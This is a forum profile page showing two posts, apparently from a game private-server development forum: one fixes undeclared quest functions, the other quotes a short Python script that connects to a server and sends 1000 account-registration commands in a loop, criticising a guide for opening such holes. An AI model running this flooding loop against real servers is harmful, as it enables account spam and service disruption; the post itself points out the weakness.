Jump to content

North

Premium
  • Posts

    465
  • Joined

  • Last visited

  • Days Won

    10
  • Feedback

    0%

Posts posted by North

  1. On 6/30/2017 at 9:10 PM, Woytman said:


            with belt_system . is_belt ( )
    Calls undeclared function! :
    item2.equip
    item2.get_attr
    item2.set_attr
    pc2.give_or_drop_item_an

    add

    "item2.equip
    item2.get_attr
    item2.set_attr
    pc2.give_or_drop_item_and_select"

    to your questfunctions

    • Love 1
  2. 25 minutes ago, Johnny69 said:
    
    		import socket
    		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    		s.connect((ip, port))
    		for i in xrange(1000):
    			s.send("\x40ACCOUNT_REGISTER,test%d,password,[email protected],1234567\n", i)
    			print s.recv(1024)
    		s.close()

    What happen if i make that ?

    They should rename they`re guides like: how to do a superuseless things that will open vulnerabilities to your server

     

     

    • Love 1
×
×
  • Create New...

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.